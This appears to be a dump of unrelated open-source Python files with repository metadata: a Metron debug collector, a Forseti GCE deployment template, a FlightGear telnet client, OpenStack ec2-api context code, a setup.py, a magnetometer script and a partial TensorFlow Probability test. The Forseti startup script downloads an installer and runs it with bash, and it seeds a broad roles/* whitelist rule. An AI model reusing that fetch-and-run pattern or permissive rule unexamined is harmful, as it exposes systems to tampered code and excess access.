ambari_pass = UserPrompt('Ambari password: ').get_hidden()
self.get_cluster_config(out_dir, ambari_user, ambari_pass)
def get_cluster_config(self, out_dir, ambari_user, ambari_pass):
# set encoding to 'identity' to keep Ambari from passing back gzipped content for large requests
headers = {
'X-Requested-By' : 'ambari',
'Authorization' : 'Basic',
'Accept-Encoding': 'identity'
}
# Retrieving Ambari config detail
response = requests.get(self.ambari_config_url, headers=headers, params=self.params_payload, stream=True, auth=HTTPBasicAuth(ambari_user, ambari_pass))
if response.status_code == 200:
file_name = 'ambari-cluster-config.json'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
FileWriter().write(full_out_path, response.text)
else:
print "Request failed with status code: " + str(response.status_code)
class StormInfo(InfoGatherer):
def __init__(self, host_info):
super(StormInfo, self).__init__('Storm')
url_base = 'http://{0}/api/v1'.format(host_info)
self.url_cluster_summary = url_base + '/cluster/summary'
self.url_cluster_configuration = url_base + '/cluster/configuration'
self.url_topology_summary = url_base + '/topology/summary'
self.url_topology_stats_summary = url_base + '/topology/{0}?sys=1'
def collect(self, out_dir):
self.get_cluster_summary(out_dir)
self.get_cluster_configuration(out_dir)
self.get_topology_summary(out_dir)
self.get_topology_stats_summary(out_dir)
def get_cluster_summary(self, out_dir):
response = requests.get(self.url_cluster_summary)
if response.status_code == 200:
file_name = 'cluster-summary.json'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
FileWriter().write(full_out_path, json.dumps(response.json(), indent=INDENT_SIZE))
else:
print "Request failed with status code: " + str(response.status_code)
def get_cluster_configuration(self, out_dir):
response = requests.get(self.url_cluster_configuration)
if response.status_code == 200:
file_name = 'cluster-configuration.json'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
FileWriter().write(full_out_path, json.dumps(response.json(), indent=INDENT_SIZE))
else:
print "Request failed with status code: " + str(response.status_code)
def get_topology_summary(self, out_dir):
response = requests.get(self.url_topology_summary)
if response.status_code == 200:
file_name = 'topology-summary.json'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
FileWriter().write(full_out_path, json.dumps(response.json(), indent=INDENT_SIZE))
else:
print "Request failed with status code: " + str(response.status_code)
def get_topology_stats_summary(self, out_dir):
summary_response = requests.get(self.url_topology_summary)
if summary_response.status_code == 200:
for feature, value in summary_response.json().iteritems():
if feature == 'topologies':
for topology in value:
for k, v in topology.iteritems():
if k == 'id':
print "Retrieving Storm topology stats summary for topology-id " + v
response = requests.get(self.url_topology_stats_summary.format(v))
if response.status_code == 200:
file_name = 'topology-{0}-stats-summary.json'.format(v)
full_out_path = os.path.join(out_dir, self.name.lower(), 'stats-summaries', file_name)
FileWriter().write(full_out_path, json.dumps(response.json(), indent=INDENT_SIZE))
else:
print "Request failed with status code: " + str(response.status_code)
else:
print "Topology listing request failed with status code: " + str(summary_response.status_code)
class KafkaInfo(InfoGatherer):
def __init__(self, broker_list, zookeeper_quorum, hdp_home):
super(KafkaInfo, self).__init__('Kafka')
self.broker_list = broker_list
self.zookeeper_quorum = zookeeper_quorum
self.hdp_home = hdp_home
        # note: the trailing single quote consumed by the tr command is escaped so the triple-quoted string literal terminates correctly
self.cmd_broker_id = '''{0}/kafka-broker/bin/zookeeper-shell.sh {1} <<< "ls /brokers/ids" | grep -e '\[.*\]' | tr -d [] | tr , ' \''''.format(self.hdp_home, self.zookeeper_quorum)
# broker id is dynamic and replaced later
self.cmd_broker_info = '''echo "get /brokers/ids/{0}" | {1}/kafka-broker/bin/zookeeper-shell.sh {2} 2>&1'''.format('{0}', self.hdp_home, self.zookeeper_quorum)
self.cmd_kafka_topics = '''{0}/kafka-broker/bin/kafka-topics.sh --zookeeper {1} --list'''.format(self.hdp_home, self.zookeeper_quorum)
self.cmd_topic_detail = '''{0}/kafka-broker/bin/kafka-topics.sh --zookeeper {1} --topic {2} --describe'''.format(self.hdp_home, self.zookeeper_quorum, '{0}')
def collect(self, out_dir):
print "Retrieving Kafka detail"
self.get_broker_info(out_dir)
self.get_kafka_topics(out_dir)
self.get_topic_detail(out_dir)
def get_broker_info(self, out_dir):
print "Retrieving Kafka broker info"
broker_ids = ShellHandler().ret_output(self.cmd_broker_id)
for broker in broker_ids.strip().split(','):
file_name = 'kafka-broker-{0}-info.txt'.format(broker)
full_out_path = os.path.join(out_dir, self.name.lower(), 'broker-info', file_name)
broker_data = ShellHandler().ret_output(self.cmd_broker_info.format(broker))
FileWriter().write(full_out_path, broker_data)
def get_kafka_topics(self, out_dir):
file_name = 'kafka-topics.txt'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
topic_list = ShellHandler().ret_output(self.cmd_kafka_topics)
FileWriter().write(full_out_path, topic_list)
def get_topic_detail(self, out_dir):
file_name = 'kafka-enrichments-topic.txt'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
enrichment_topic_detail = ShellHandler().ret_output(self.cmd_topic_detail.format('enrichments'))
FileWriter().write(full_out_path, enrichment_topic_detail)
file_name = 'kafka-indexing-topic.txt'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
indexing_topic_detail = ShellHandler().ret_output(self.cmd_topic_detail.format('indexing'))
FileWriter().write(full_out_path, indexing_topic_detail)
class MetronInfo(InfoGatherer):
def __init__(self, metron_home, zookeeper_quorum):
super(MetronInfo, self).__init__('Metron')
self.metron_home = metron_home
self.zookeeper_quorum = zookeeper_quorum
self.cmd_zk_load_configs = '''{0}/bin/zk_load_configs.sh -m DUMP -z {1}'''.format(self.metron_home, self.zookeeper_quorum)
self.cmd_metron_lib_list = '''ls -al {0}/lib'''.format(self.metron_home)
def collect(self, out_dir):
self.get_metron_config(out_dir)
self.get_metron_flux(out_dir)
self.get_metron_zk_config(out_dir)
self.get_lib_listing(out_dir)
self.get_rpm_listing(out_dir)
def get_metron_config(self, out_dir):
print 'Copying ' + self.metron_home + '/config'
full_out_path = os.path.join(out_dir, self.name.lower(), 'config')
shutil.copytree(self.metron_home + '/config', full_out_path)
def get_metron_flux(self, out_dir):
print 'Copying ' + self.metron_home + '/flux'
full_out_path = os.path.join(out_dir, self.name.lower(), 'flux')
shutil.copytree(self.metron_home + '/flux', full_out_path)
def get_metron_zk_config(self, out_dir):
zk_config_dump = ShellHandler().ret_output(self.cmd_zk_load_configs)
full_out_path = os.path.join(out_dir, self.name.lower(), 'zk-configs.txt')
FileWriter().write(full_out_path, zk_config_dump)
def get_lib_listing(self, out_dir):
metron_lib_list = ShellHandler().ret_output(self.cmd_metron_lib_list)
full_out_path = os.path.join(out_dir, self.name.lower(), 'metron-libs-dir.txt')
FileWriter().write(full_out_path, metron_lib_list)
def get_rpm_listing(self, out_dir):
metron_rpm_list = ShellHandler().ret_output('''rpm -qa | grep 'metron\|elasticsearch\|kibana\'''')
full_out_path = os.path.join(out_dir, self.name.lower(), 'metron-rpm-list.txt')
FileWriter().write(full_out_path, metron_rpm_list)
class HdpInfo(InfoGatherer):
def __init__(self, hdp_home):
super(HdpInfo, self).__init__('HDP')
self.hdp_home = hdp_home
def collect(self, out_dir):
hadoop_version_info = ShellHandler().ret_output('hadoop version')
full_out_path = os.path.join(out_dir, self.name.lower(), 'version-info.txt')
FileWriter().write(full_out_path, hadoop_version_info)
class ClusterInfo:
def __init__(self):
pass
def main(self):
(options, args) = self.get_cli_args()
self.collect_data(options.out_dir,
options.ambari_host,
options.cluster_name,
options.storm_host,
options.broker_list,
options.zookeeper_quorum,
options.metron_home,
options.hdp_home)
def get_cli_args(self):
parser = OptionParser()
parser.add_option("-a", "--ambari-host",
action="store",
type="string",
dest="ambari_host",
help="Connect to Ambari via the supplied host:port",
default="node1:8080",
metavar="HOST:PORT")
parser.add_option("-c", "--cluster-name",
action="store",
type="string",
dest="cluster_name",
help="Name of cluster in Ambari to retrieve info for",
default="metron_cluster",
metavar="NAME")
parser.add_option("-o", "--out-dir",
action="store",
type="string",
dest="out_dir",
help="Write debugging data to specified root directory",
default=".",
metavar="DIRECTORY")
parser.add_option("-s", "--storm-host",
action="store",
type="string",
dest="storm_host",
help="Connect to Storm via the supplied host:port",
default="node1:8744",
metavar="HOST:PORT")
parser.add_option("-b", "--broker_list",
action="store",
type="string",
dest="broker_list",
help="Connect to Kafka via the supplied comma-delimited host:port list",
default="node1:6667",
metavar="HOST1:PORT,HOST2:PORT")
parser.add_option("-z", "--zookeeper_quorum",
action="store",
type="string",
dest="zookeeper_quorum",
help="Connect to Zookeeper via the supplied comma-delimited host:port quorum list",
default="node1:2181",
metavar="HOST1:PORT,HOST2:PORT")
parser.add_option("-m", "--metron_home",
action="store",
type="string",
dest="metron_home",
help="Metron home directory",
default="/usr/metron/0.5.1",
metavar="DIRECTORY")
parser.add_option("-p", "--hdp_home",
action="store",
type="string",
dest="hdp_home",
help="HDP home directory",
default="/usr/hdp/current",
metavar="DIRECTORY")
return parser.parse_args()
def collect_data(self,
out_dir_base,
ambari_host,
cluster_name,
storm_host,
broker_list,
zookeeper_quorum,
metron_home,
hdp_home):
out_dir = self.get_out_dirname(out_dir_base)
info_getters = [
AmbariInfo(ambari_host, cluster_name),
StormInfo(storm_host),
KafkaInfo(broker_list, zookeeper_quorum, hdp_home),
MetronInfo(metron_home, zookeeper_quorum),
HdpInfo(hdp_home)
]
for getter in info_getters:
getter.collect(out_dir)
self.compress_files(out_dir)
print "Finished gathering debug info"
# creates dir w/timestamp to drop all configs
# e.g. metron-debug-2018-03-24_06-50-34
def get_out_dirname(self, out_dir_base):
return os.path.join(out_dir_base, 'metron-debug-' + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))
def compress_files(self, out_dir):
tarball_name = out_dir + '.tgz'
print "Creating tarfile bundle with all configs: '{0}'".format(tarball_name)
with closing(tarfile.open(tarball_name, 'w:gz')) as tar:
tar.add(out_dir, arcname=os.path.basename(out_dir))
print "...done"
if __name__ == "__main__":
ClusterInfo().main()
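
# Illustrative invocation (option names from get_cli_args above; hosts and
# paths are hypothetical):
#   python cluster_info.py -a node1:8080 -c metron_cluster -s node1:8744 \
#       -b node1:6667 -z node1:2181 -m /usr/metron/0.5.1 -p /usr/hdp/current -o /tmp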
|
cestella/incubator-metron
|
metron-platform/metron-common/src/main/scripts/cluster_info.py
|
Python
|
apache-2.0
| 17,320
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Creates a GCE instance template for Forseti Security."""
def GenerateConfig(context):
"""Generate configuration."""
USE_BRANCH = context.properties.get('branch-name')
ORGANIZATION_ID = context.properties['organization-id']
if USE_BRANCH:
DOWNLOAD_FORSETI = """
git clone {}.git --branch {} --single-branch forseti-security
cd forseti-security
""".format(
context.properties['src-path'],
context.properties['branch-name'])
else:
DOWNLOAD_FORSETI = """
wget -qO- {}/archive/v{}.tar.gz | tar xvz
cd forseti-security-{}
""".format(
context.properties['src-path'],
context.properties['release-version'],
context.properties['release-version'])
CLOUDSQL_CONN_STRING = '{}:{}:{}'.format(
context.env['project'],
'$(ref.cloudsql-instance.region)',
'$(ref.cloudsql-instance.name)')
SCANNER_BUCKET = context.properties['scanner-bucket']
SERVICE_ACCOUNT_SCOPES = context.properties['service-account-scopes']
FORSETI_CONFIG = context.properties['forseti-config']
inventory_command = (
'/usr/local/bin/forseti_inventory --forseti_config {} '
.format(
FORSETI_CONFIG,
)
)
scanner_command = (
('/usr/local/bin/forseti_scanner --rules {} --engine {} '
'--forseti_config {} ')
.format(
'gs://{}/scanner_violations'.format(SCANNER_BUCKET),
'IamRulesEngine',
FORSETI_CONFIG,
)
)
# TODO: remove this little hack when we update the release...
NEW_FORSETI_CONFIG = """
# Build protos separately.
python build_protos.py --clean
"""
OLD_BUILD_PROTOS = ''
resources = []
resources.append({
'name': '{}-vm'.format(context.env['deployment']),
'type': 'compute.v1.instance',
'properties': {
'zone': context.properties['zone'],
'machineType': (
'https://www.googleapis.com/compute/v1/projects/{}'
'/zones/{}/machineTypes/{}'.format(
context.env['project'], context.properties['zone'],
context.properties['instance-type'])),
'disks': [{
'deviceName': 'boot',
'type': 'PERSISTENT',
'boot': True,
'autoDelete': True,
'initializeParams': {
'sourceImage': (
'https://www.googleapis.com/compute/v1'
'/projects/{}/global/images/family/{}'.format(
context.properties['image-project'],
context.properties['image-family']
)
)
}
}],
'networkInterfaces': [{
'network': (
'https://www.googleapis.com/compute/v1/'
'projects/{}/global/networks/default'.format(
context.env['project'])),
'accessConfigs': [{
'name': 'External NAT',
'type': 'ONE_TO_ONE_NAT'
}]
}],
'serviceAccounts': [{
'email': context.properties['service-account'],
'scopes': SERVICE_ACCOUNT_SCOPES,
}],
'metadata': {
'items': [{
'key': 'startup-script',
'value': """#!/bin/bash
exec > /tmp/deployment.log
exec 2>&1
# Ubuntu update
sudo apt-get update -y
sudo apt-get upgrade -y
# Forseti setup
sudo apt-get install -y git unzip
# Forseti dependencies
sudo apt-get install -y libmysqlclient-dev python-pip python-dev
USER_HOME=/home/ubuntu
# Install fluentd if necessary
FLUENTD=$(ls /usr/sbin/google-fluentd)
if [ -z "$FLUENTD" ]; then
cd $USER_HOME
curl -sSO https://dl.google.com/cloudagents/install-logging-agent.sh
bash install-logging-agent.sh
fi
# Check whether Cloud SQL proxy is installed
CLOUD_SQL_PROXY=$(ls $USER_HOME/cloud_sql_proxy)
if [ -z "$CLOUD_SQL_PROXY" ]; then
cd $USER_HOME
wget https://dl.google.com/cloudsql/cloud_sql_proxy.{}
mv cloud_sql_proxy.{} cloud_sql_proxy
chmod +x cloud_sql_proxy
fi
$USER_HOME/cloud_sql_proxy -instances={}=tcp:{} &
# Check if rules.yaml exists
RULES_FILE=$(gsutil ls gs://{}/rules/rules.yaml)
if [ $? -eq 1 ]; then
cd $USER_HOME
read -d '' RULES_YAML << EOF
rules:
- name: sample whitelist
mode: whitelist
resource:
- type: organization
applies_to: self_and_children
resource_ids:
- {}
inherit_from_parents: true
bindings:
- role: roles/*
members:
- serviceAccount:*@*.gserviceaccount.com
EOF
echo "$RULES_YAML" > $USER_HOME/rules.yaml
gsutil cp $USER_HOME/rules.yaml gs://{}/rules/rules.yaml
fi
# Install Forseti Security
cd $USER_HOME
rm -rf forseti-*
rm -rf run_forseti.sh
pip install --upgrade pip
pip install --upgrade setuptools
pip install grpcio grpcio-tools
{}
# Download Forseti src; see DOWNLOAD_FORSETI
{}
# Prevent namespace clash
pip uninstall --yes protobuf
{}
python setup.py install
# Create the startup run script
read -d '' RUN_FORSETI << EOF
#!/bin/bash
# inventory command
{}
# scanner command
{}
EOF
echo "$RUN_FORSETI" > $USER_HOME/run_forseti.sh
chmod +x $USER_HOME/run_forseti.sh
/bin/sh $USER_HOME/run_forseti.sh
(echo "0 * * * * $USER_HOME/run_forseti.sh") | crontab -
""".format(
# cloud_sql_proxy
context.properties['cloudsqlproxy-os-arch'],
context.properties['cloudsqlproxy-os-arch'],
CLOUDSQL_CONN_STRING,
context.properties['db-port'],
# rules.yaml
SCANNER_BUCKET,
ORGANIZATION_ID,
SCANNER_BUCKET,
# old style build protobufs
OLD_BUILD_PROTOS,
# install forseti
DOWNLOAD_FORSETI,
# copy Forseti config file
NEW_FORSETI_CONFIG,
# run_forseti.sh
# - forseti_inventory
inventory_command,
# - forseti_scanner
scanner_command,
)
}]
}
}
})
return {'resources': resources}
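

# Sketch of a Deployment Manager config that might reference this template
# (property keys mirror the context.properties reads above; every value is
# hypothetical):
#
#   resources:
#   - name: forseti-instance
#     type: forseti-instance.py
#     properties:
#       organization-id: "1234567890"
#       zone: us-central1-c
#       instance-type: n1-standard-2
#       scanner-bucket: my-forseti-scanner-bucket
#       forseti-config: /home/ubuntu/forseti_conf.yaml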
|
cschnei3/forseti-security
|
deployment-templates/forseti-instance.py
|
Python
|
apache-2.0
| 6,784
|
from telnetlib import Telnet
from telnetlib import IAC, NOP
import socket
import re
from string import split
__all__ = ["FlightGear"]
CRLF = '\r\n'
class FGTelnet(Telnet):
def __init__(self, host, port):
Telnet.__init__(self, host, port)
self.prompt = []
self.sock.sendall(IAC + NOP)
self.prompt.append(re.compile('/[^>]*> '))
self.timeout = 5
# Telnet.set_debuglevel(self,2)
def help(self):
return
def ls(self, dir=None):
"""
Returns a list of properties.
"""
        if dir is None:
self._putcmd('ls')
else:
self._putcmd('ls %s' % dir)
return self._getresp()
def dump(self):
"""Dump current state as XML."""
self._putcmd('dump')
return self._getresp()
def cd(self, dir):
"""Change directory."""
self._putcmd('cd ' + dir)
self._getresp()
return
def pwd(self):
"""Display current path."""
self._putcmd('pwd')
return self._getresp()
def get(self, var):
"""Retrieve the value of a parameter."""
self._putcmd('get %s' % var)
return self._getresp()
def set(self, var, value):
"""Set variable to a new value"""
self._putcmd('set %s %s' % (var, value))
self._getresp() # Discard response
def quit(self):
"""Terminate connection"""
self._putcmd('quit')
self.close()
return
# Internal: send one command to FlightGear
def _putcmd(self, cmd):
        cmd = cmd + CRLF
Telnet.write(self, cmd)
return
# Internal: get a response from FlightGear
def _getresp(self):
(i, match, resp) = Telnet.expect(self, self.prompt, self.timeout)
# Remove the terminating prompt.
# Everything preceding it is the response.
return split(resp, '\n')[:-1]
class FlightGear:
"""FlightGear interface class.
An instance of this class represents a connection to a FlightGear telnet
server.
Properties are accessed using a dictionary style interface:
For example:
# Connect to flightgear telnet server.
fg = FlightGear('myhost', 5500)
# parking brake on
fg['/controls/gear/brake-parking'] = 1
# Get current heading
heading = fg['/orientation/heading-deg']
    Other, non-property-related helpers (view_next, view_prev, quit) wrap
    common commands.
"""
def __init__(self, host='localhost', port=5500):
try:
self.telnet = FGTelnet(host, port)
except socket.error, msg:
self.telnet = None
raise socket.error, msg
def __del__(self):
# Ensure telnet connection is closed cleanly.
self.quit()
def __getitem__(self, key):
"""Get a FlightGear property value.
Where possible the value is converted to the equivalent Python type.
"""
s = self.telnet.get(key)[0]
match = re.compile('[^=]*=\s*\'([^\']*)\'\s*([^\r]*)\r').match(s)
if not match:
return None
value, type = match.groups()
# value = match.group(1)
#type = match.group(2)
if value == '':
return None
if type == '(double)':
return float(value)
elif type == '(int)':
return int(value)
elif type == '(bool)':
if value == 'true':
return 1
else:
return 0
else:
return value
def __setitem__(self, key, value):
"""Set a FlightGear property value."""
self.telnet.set(key, value)
def quit(self):
"""Close the telnet connection to FlightGear."""
if self.telnet:
self.telnet.quit()
self.telnet = None
def view_next(self):
# move to next view
self.telnet.set("/command/view/next", "true")
def view_prev(self):
        # move to previous view
self.telnet.set("/command/view/prev", "true")
|
niranjan94/flightgear-cc
|
flightgear-cc-bridge/libs/FlightGear.py
|
Python
|
apache-2.0
| 3,992
|
# Copyright 2014
# The Cloudscaling Group, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""RequestContext: context for requests that persist through all of ec2."""
from oslo_config import cfg
from oslo_context import context
from oslo_log import log as logging
from oslo_utils import timeutils
import six
from ec2api import clients
from ec2api import exception
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class RequestContext(context.RequestContext):
"""Security context and request information.
Represents the user taking a given action within the system.
"""
def __init__(self, user_id, project_id, request_id=None,
is_admin=None, remote_address=None,
auth_token=None, user_name=None, project_name=None,
overwrite=True, service_catalog=None, api_version=None,
is_os_admin=None, **kwargs):
"""Parameters
:param overwrite: Set to False to ensure that the greenthread local
copy of the index is not overwritten.
:param kwargs: Extra arguments that might be present, but we ignore
because they possibly came in from older rpc messages.
"""
user = kwargs.pop('user', None)
tenant = kwargs.pop('tenant', None)
super(RequestContext, self).__init__(
auth_token=auth_token,
user=user_id or user,
tenant=project_id or tenant,
is_admin=is_admin,
request_id=request_id,
resource_uuid=kwargs.pop('resource_uuid', None),
overwrite=overwrite)
# oslo_context's RequestContext.to_dict() generates this field, we can
# safely ignore this as we don't use it.
kwargs.pop('user_identity', None)
self.session = kwargs.pop('session', None)
if kwargs:
LOG.warning('Arguments dropped when creating context: %s',
str(kwargs))
self.user_id = user_id
self.project_id = project_id
self.remote_address = remote_address
timestamp = timeutils.utcnow()
if isinstance(timestamp, six.string_types):
timestamp = timeutils.parse_strtime(timestamp)
self.timestamp = timestamp
self.service_catalog = service_catalog
if self.service_catalog is None:
# if list is empty or none
self.service_catalog = []
self.user_name = user_name
self.project_name = project_name
self.is_admin = is_admin
# TODO(ft): call policy.check_is_admin if is_admin is None
self.is_os_admin = is_os_admin
self.api_version = api_version
def to_dict(self):
values = super(RequestContext, self).to_dict()
# FIXME(dims): defensive hasattr() checks need to be
# removed once we figure out why we are seeing stack
# traces
values.update({
'user_id': getattr(self, 'user_id', None),
'project_id': getattr(self, 'project_id', None),
'is_admin': getattr(self, 'is_admin', None),
'remote_address': getattr(self, 'remote_address', None),
'timestamp': self.timestamp.strftime(
timeutils.PERFECT_TIME_FORMAT) if hasattr(
self, 'timestamp') else None,
'request_id': getattr(self, 'request_id', None),
'quota_class': getattr(self, 'quota_class', None),
'user_name': getattr(self, 'user_name', None),
'service_catalog': getattr(self, 'service_catalog', None),
'project_name': getattr(self, 'project_name', None),
'is_os_admin': getattr(self, 'is_os_admin', None),
'api_version': getattr(self, 'api_version', None),
})
return values
@classmethod
def from_dict(cls, values):
return cls(**values)
def is_user_context(context):
"""Indicates if the request context is a normal user."""
if not context:
return False
if context.is_os_admin:
return False
if not context.user_id or not context.project_id:
return False
return True
def require_context(ctxt):
"""Raise exception.AuthFailure()
if context is not a user or an admin context.
"""
if not ctxt.is_os_admin and not is_user_context(ctxt):
raise exception.AuthFailure()
def get_os_admin_context():
"""Create a context to interact with OpenStack as an administrator."""
admin_session = clients.get_os_admin_session()
return RequestContext(
None, None,
session=admin_session,
is_os_admin=True,
overwrite=False)
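

# Illustrative usage sketch (hypothetical ids): a plain user context passes
# require_context, while get_os_admin_context() yields an administrative
# context with no user or project bound.
#   ctx = RequestContext('user-1', 'project-1')
#   require_context(ctx)  # no exception: this is a normal user context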
|
stackforge/ec2-api
|
ec2api/context.py
|
Python
|
apache-2.0
| 5,158
|
from setuptools import setup
with open('README.md') as readme:
long_description = readme.read()
setup(
name='girder-monkeybrains',
version='1.0.5',
description='Displays monkey neurodevelopmental data.',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/girder/monkeybrains',
maintainer='Kitware, Inc.',
maintainer_email='kitware@kitware.com',
packages=['girder_monkeybrains'],
install_requires=['girder'],
include_package_data=True,
entry_points={
'girder.plugin': [
'monkeybrains = girder_monkeybrains:MonkeybrainsPlugin'
]
}
)
|
girder/monkeybrains
|
setup.py
|
Python
|
apache-2.0
| 672
|
#!/usr/bin/env python
# Chris Riederer
# 2014-08-13
"""This script is to look at the data coming from Physics Toolbox Magnetometer.
It's to help debug the magnet button on Google Cardboard.
"""
import test_detect as t
import sys
if len(sys.argv) < 2:
    print "Please provide the name of the file you'd like to analyze."
    sys.exit(1)

runData = t.MakeDummyRunData()
with open(sys.argv[1]) as f:
magdata = []
f.readline()
f.readline()
for line in f:
empty, time, x, y, z = line.strip().split(',')
magdata.append(map(float, [time, 0, x, y, z]))
runData['magnetometer'] = magdata
runDataList = [runData]
runDataList = t.preprocessRunData(runDataList)
detector = t.TimeWindowDetector()
detector.segment_time = 175
# detector = t.OriginalDetector()
# t.PlotData(runData)
# t.pl.show()
# t.testDetector(detector, runDataList, optPlotData=True)
t.PlotThresholds(runData, 30, 130, segment_size=400)
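
# Illustrative usage (the input is a Physics Toolbox Magnetometer CSV export:
# two header lines, then rows of ",time,x,y,z"):
#   python analyzePhysicsToolbox.py magnetometer_log.csv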
|
dodger487/MIST
|
data/analyzePhysicsToolbox.py
|
Python
|
apache-2.0
| 906
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Dependency imports
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
from tensorflow_probability.python import distributions as tfd
from tensorflow_probability.python.internal import tensorshape_util
from tensorflow_probability.python.internal import test_util
from tensorflow_probability.python.math import psd_kernels
class _GaussianProcessTest(object):
def testShapes(self):
# 5x5 grid of index points in R^2 and flatten to 25x2
index_points = np.linspace(-4., 4., 5, dtype=np.float32)
index_points = np.stack(np.meshgrid(index_points, index_points), axis=-1)
index_points = np.reshape(index_points, [-1, 2])
# ==> shape = [25, 2]
# Kernel with batch_shape [2, 4, 3, 1]
amplitude = np.array([1., 2.], np.float32).reshape([2, 1, 1, 1])
length_scale = np.array([1., 2., 3., 4.], np.float32).reshape([1, 4, 1, 1])
observation_noise_variance = np.array(
[1e-5, 1e-6, 1e-5], np.float32).reshape([1, 1, 3, 1])
batched_index_points = np.stack([index_points]*6)
# ==> shape = [6, 25, 2]
if not self.is_static:
amplitude = tf1.placeholder_with_default(amplitude, shape=None)
length_scale = tf1.placeholder_with_default(length_scale, shape=None)
batched_index_points = tf1.placeholder_with_default(
batched_index_points, shape=None)
kernel = psd_kernels.ExponentiatedQuadratic(amplitude, length_scale)
gp = tfd.GaussianProcess(
kernel,
batched_index_points,
observation_noise_variance=observation_noise_variance,
jitter=1e-5,
validate_args=True)
batch_shape = [2, 4, 3, 6]
event_shape = [25]
sample_shape = [5, 3]
samples = gp.sample(sample_shape, seed=test_util.test_seed())
if self.is_static or tf.executing_eagerly():
self.assertAllEqual(gp.batch_shape_tensor(), batch_shape)
self.assertAllEqual(gp.event_shape_tensor(), event_shape)
self.assertAllEqual(samples.shape,
sample_shape + batch_shape + event_shape)
self.assertAllEqual(gp.batch_shape, batch_shape)
self.assertAllEqual(gp.event_shape, event_shape)
self.assertAllEqual(samples.shape,
sample_shape + batch_shape + event_shape)
self.assertAllEqual(gp.mean().shape, batch_shape + event_shape)
self.assertAllEqual(gp.variance().shape, batch_shape + event_shape)
else:
self.assertAllEqual(self.evaluate(gp.batch_shape_tensor()), batch_shape)
self.assertAllEqual(self.evaluate(gp.event_shape_tensor()), event_shape)
self.assertAllEqual(
self.evaluate(samples).shape,
sample_shape + batch_shape + event_shape)
self.assertIsNone(tensorshape_util.rank(samples.shape))
self.assertIsNone(tensorshape_util.rank(gp.batch_shape))
self.assertEqual(tensorshape_util.rank(gp.event_shape), 1)
self.assertIsNone(
tf.compat.dimension_value(tensorshape_util.dims(gp.event_shape)[0]))
self.assertAllEqual(
self.evaluate(tf.shape(gp.mean())), batch_shape + event_shape)
self.assertAllEqual(self.evaluate(
tf.shape(gp.variance())), batch_shape + event_shape)
def testVarianceAndCovarianceMatrix(self):
amp = np.float64(.5)
len_scale = np.float64(.2)
jitter = np.float64(1e-4)
observation_noise_variance = np.float64(3e-3)
kernel = psd_kernels.ExponentiatedQuadratic(amp, len_scale)
index_points = np.expand_dims(np.random.uniform(-1., 1., 10), -1)
gp = tfd.GaussianProcess(
kernel,
index_points,
observation_noise_variance=observation_noise_variance,
jitter=jitter,
validate_args=True)
def _kernel_fn(x, y):
return amp ** 2 * np.exp(-.5 * (np.squeeze((x - y)**2)) / (len_scale**2))
expected_covariance = (
_kernel_fn(np.expand_dims(index_points, 0),
np.expand_dims(index_points, 1)) +
observation_noise_variance * np.eye(10))
self.assertAllClose(expected_covariance,
self.evaluate(gp.covariance()))
self.assertAllClose(np.diag(expected_covariance),
self.evaluate(gp.variance()))
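
  # For reference: the ExponentiatedQuadratic kernel exercised above has the
  # closed form k(x, y) = amplitude**2 * exp(-||x - y||**2 / (2 * length_scale**2)),
  # which _kernel_fn mirrors in NumPy for the 1-d index points used here.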
def testMean(self):
mean_fn = lambda x: x[:, 0]**2
kernel = psd_kernels.ExponentiatedQuadratic()
index_points = np.expand_dims(np.random.uniform(-1., 1., 10), -1)
gp = tfd.GaussianProcess(
kernel, index_points, mean_fn=mean_fn, validate_args=True)
expected_mean = mean_fn(index_points)
self.assertAllClose(expected_mean,
self.evaluate(gp.mean()))
def testCopy(self):
# 5 random index points in R^2
index_points_1 = np.random.uniform(-4., 4., (5, 2)).astype(np.float32)
# 10 random index points in R^2
index_points_2 = np.random.uniform(-4., 4., (10, 2)).astype(np.float32)
if not self.is_static:
index_points_1 = tf1.placeholder_with_default(index_points_1, shape=None)
index_points_2 = tf1.placeholder_with_default(index_points_2, shape=None)
mean_fn = lambda x: np.array([0.], np.float32)
kernel_1 = psd_kernels.ExponentiatedQuadratic()
kernel_2 = psd_kernels.ExpSinSquared()
gp1 = tfd.GaussianProcess(
kernel_1, index_points_1, mean_fn, jitter=1e-5, validate_args=True)
gp2 = gp1.copy(index_points=index_points_2,
kernel=kernel_2)
event_shape_1 = [5]
event_shape_2 = [10]
self.assertEqual(gp1.mean_fn, gp2.mean_fn)
self.assertIsInstance(gp1.kernel, psd_kernels.ExponentiatedQuadratic)
self.assertIsInstance(gp2.kernel, psd_kernels.ExpSinSquared)
if self.is_static or tf.executing_eagerly():
self.assertAllEqual(gp1.batch_shape, gp2.batch_shape)
self.assertAllEqual(gp1.event_shape, event_shape_1)
